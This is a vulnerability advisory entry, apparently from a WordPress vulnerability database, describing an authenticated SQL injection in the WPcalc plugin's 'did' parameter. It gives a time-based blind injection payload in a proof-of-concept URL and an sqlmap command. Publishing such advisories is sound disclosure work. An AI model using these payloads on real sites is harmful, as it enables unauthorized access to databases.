WordPress Plugin Vulnerabilities
WPcalc <= 2.1 - Authenticated SQL Injection
Description
The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability.
Plugin author closed the plugin.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl) or, using the sqlmap tool: ./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xdecafbad
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-09 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)